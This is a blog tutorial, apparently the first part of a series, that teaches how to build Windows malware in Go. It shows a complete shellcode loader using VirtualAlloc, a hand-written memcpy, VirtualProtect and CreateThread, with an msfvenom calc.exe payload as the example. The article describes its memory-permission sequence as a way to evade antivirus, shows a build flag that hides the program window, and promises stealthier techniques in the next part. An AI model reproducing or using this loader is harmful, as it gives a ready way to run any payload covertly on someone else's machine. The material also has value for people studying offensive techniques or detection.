Simple malware in Golang
- published
- reading time
- 6 minutes
Introduction
Malware development is a vast subject that can be very complex. The aim of these articles is to explore various malware and offensive security techniques by redeveloping them in Golang. In the first episode of this series, we’ll start with the basics and learn how to inject shell code into memory.
But let’s start with the basics: what’s a shellcode?
Shellcode
A shellcode is a string of characters representing executable binary code. A shellcode is PIC, Position-Independent Code, which means it’s designed to be executed regardless of its position in memory.
It’s a very handy format when it comes to developing malware. There are many ways to generate shellcode, and many C2 programs offer this format. It is also possible to convert an executable into shellcode using tools such as donut.
To create our malware, we’ll use shellcode to launch the calc.exe program on Windows. In general, a shellcode can be represented in hexadecimal (-f hex with msfvenom) or binary.
To convert a binary shellcode into hexadecimal, use this command hexdump -v -e '1/1 "%02x"' <bin_file>. In our code, we’ll then need to convert it back to binary.
This gives :
// msfvenom -p windows/x64/exec CMD=calc.exe -f hex
shellcode,_ := hex.DecodeString("50515253565755...")
Injection
Here’s how to inject our shellcode:
- Allocate memory
- Copy our shellcode
- Make this memory area executable
- Make a thread to execute our shellcode
VirtualAlloc
https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc
We’re going to use VirtualAlloc to allocate an area of memory in which to copy our shellcode. In Go, we can use the Windows package which contains a VirtualAlloc function. https://pkg.go.dev/golang.org/x/sys/windows#VirtualAlloc which is simply a wrapper around the API call.
This is how it looks like:
package main
import (
"encoding/hex"
"golang.org/x/sys/windows"
"log"
)
func main() {
shellcode, _ := hex.DecodeString("505152535657556A605A6863616C6354594883...")
shellcodeExec, err := windows.VirtualAlloc(
uintptr(0), //[in, optional] LPVOID lpAddress,
uintptr(len(shellcode)), //[in] SIZE_T dwSize,
windows.MEM_COMMIT|windows.MEM_RESERVE, //[in] DWORD flAllocationType,
windows.PAGE_READWRITE, //[in] DWORD flProtect
)
if err != nil {
log.Fatal("Error while VirtualAlloc:", err)
}
fmt.Printf("Address: %x", shellcodeExec)
fmt.Scanln()
}
So, in the first argument, we pass the memory address where we’d like to allocate our memory. Since we don’t care, and the argument is optional, we pass it 0. Next, the size to be allocated, i.e. the size of our shellcode. The next argument is the type of memory allocation and finally the rights to this memory area. Eventually, we’ll make it executable, but for reasons of antivirus detection, we’ll do that later.
To see what’s going on, I’ve added a print of the memory address where we’re going to allocate the memory and a fmt.Scan.ln() which will allow us to stop the program to see what’s happening with the debugger.
Run the program and the memory address of the allocated zone will be displayed.
Address: 1fcd76c0000
Using x64dbg, we can attach ourselves to the process, go without a memory section, and look for this address.
We can see that our memory zone is in Read Write mode and if we click on it, we can see that it contains nothing yet.
Copy shellcode
We could use RtlCopyMemory to do this, but we’re going to use a method without an API call instead. This function, taken from an example by Tim White, is an implementation of the memcpy function in Golang. It takes as arguments the destination address and the byte array to be placed there.
// memcpy in golang from https://github.com/timwhitez/Doge-Gabh/blob/main/example/shellcodecalc/calc.go
func memcpy(base uintptr, buf []byte) {
for i := 0; i < len(buf); i++ {
*(*byte)(unsafe.Pointer(base + uintptr(i))) = buf[i]
}
}
Our code now looks like this:
package main
import (
"encoding/hex"
"fmt"
"golang.org/x/sys/windows"
"log"
"unsafe"
)
var (
kernel32 = windows.NewLazySystemDLL("kernel32.dll")
createThread = kernel32.NewProc("CreateThread")
)
func main() {
shellcode, _ := hex.DecodeString("505152535657556A605A6863616C6354594883...")
shellcodeExec, err := windows.VirtualAlloc(
uintptr(0), //[in, optional] LPVOID lpAddress,
uintptr(len(shellcode)), //[in] SIZE_T dwSize,
windows.MEM_COMMIT|windows.MEM_RESERVE, //[in] DWORD flAllocationType,
windows.PAGE_READWRITE, //[in] DWORD flProtect
)
if err != nil {
log.Fatal("Error while VirtualAlloc:", err)
}
fmt.Printf("Address: %x", shellcodeExec)
fmt.Scanln()
memcpy(shellcodeExec, shellcode)
fmt.Scanln()
}
// memcpy in golang from https://github.com/timwhitez/Doge-Gabh/blob/main/example/shellcodecalc/calc.go
func memcpy(base uintptr, buf []byte) {
for i := 0; i < len(buf); i++ {
*(*byte)(unsafe.Pointer(base + uintptr(i))) = buf[i]
}
}
As before, I’ve added a fmt.Scan.ln() to act as a breakpoint. If you run it and look at the memory area previously allocated, you’ll see our shellcode.
VirtualProtect
https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect
We’re now going to change the rights of the memory zone to make it executable.
var oldProtect uint32
err = windows.VirtualProtect(
shellcodeExec, //[in] LPVOID lpAddress,
uintptr(len(shellcode)), //[in] SIZE_T dwSize,
windows.PAGE_EXECUTE_READ, //[in] DWORD flNewProtect,
&oldProtect, //[out] PDWORD lpflOldProtect
)
if err != nil {
log.Fatal("Error while VirtualProtect:", err)
}
fmt.Scanln()
This function works a bit like VirtualAlloc. We give it the address of our shellcode, the size, the new rights, and oldProtect will contain the old rights. After modifying the memory zone, we see that we’re no longer in Read Write mode, but in Execute Read mode.
CreateThread
We’ll end up creating a new Thread. This function doesn’t exist in the Windows package, so we’ll do it by hand. To find out if it’s present in kernel32.dll, simply consult the Microsoft documentation.
kernel32 = windows.NewLazySystemDLL("kernel32.dll")
createThread := kernel32.NewProc("CreateThread")
hThread,_,_ := createThread.Call(
0, //lpThreadAttributes
0, //dwStackSize
shellcodeExec, //lpStartAddress
uintptr(0), //lpParameter
0, //dwCreationFlag
0) //lpThreadId
What’s really important is the lpStartAddress, which contains the address of our shellcode. Normally, at this point we should have calc.exe running.
Result
package main
import (
"encoding/hex"
"golang.org/x/sys/windows"
"log"
"unsafe"
)
var (
kernel32 = windows.NewLazySystemDLL("kernel32.dll")
createThread = kernel32.NewProc("CreateThread")
)
func main() {
shellcode, _ := hex.DecodeString("505152535657556A605A6863616C6354594883...")
shellcodeExec, err := windows.VirtualAlloc(
uintptr(0), //[in, optional] LPVOID lpAddress,
uintptr(len(shellcode)), //[in] SIZE_T dwSize,
windows.MEM_COMMIT|windows.MEM_RESERVE, //[in] DWORD flAllocationType,
windows.PAGE_READWRITE, //[in] DWORD flProtect
)
if err != nil {
log.Fatal("Error while VirtualAlloc:", err)
}
memcpy(shellcodeExec, shellcode)
var oldProtect uint32
err = windows.VirtualProtect(
shellcodeExec, //[in] LPVOID lpAddress,
uintptr(len(shellcode)), //[in] SIZE_T dwSize,
windows.PAGE_EXECUTE_READ, //[in] DWORD flNewProtect,
&oldProtect, //[out] PDWORD lpflOldProtect
)
if err != nil {
log.Fatal("Error while VirtualProtect:", err)
}
_, _, err = createThread.Call(
0, //[in, optional] LPSECURITY_ATTRIBUTES lpThreadAttributes,
0, //[in] SIZE_T dwStackSize,
shellcodeExec, //[in] LPTHREAD_START_ROUTINE lpStartAddress,
uintptr(0), //[in, optional] __drv_aliasesMem LPVOID lpParameter,
0, //[in] DWORD dwCreationFlags,
0, //[out, optional] LPDWORD lpThreadId
)
if err.Error() != "The operation completed successfully." {
log.Fatal("Error while CreateThread:", err)
}
}
// memcpy in golang from https://github.com/timwhitez/Doge-Gabh/blob/main/example/shellcodecalc/calc.go
func memcpy(base uintptr, buf []byte) {
for i := 0; i < len(buf); i++ {
*(*byte)(unsafe.Pointer(base + uintptr(i))) = buf[i]
}
}
Compilation
If you don’t want a window to appear when your program is executed, you can use the windowsgui flag.
go build -ldflags -H=windowsgui
Conclusion
In this first article, we’ve seen how to inject shellcode into memory. In the next article, we’ll look at how to make our malware a little more discreet.
Tschüss!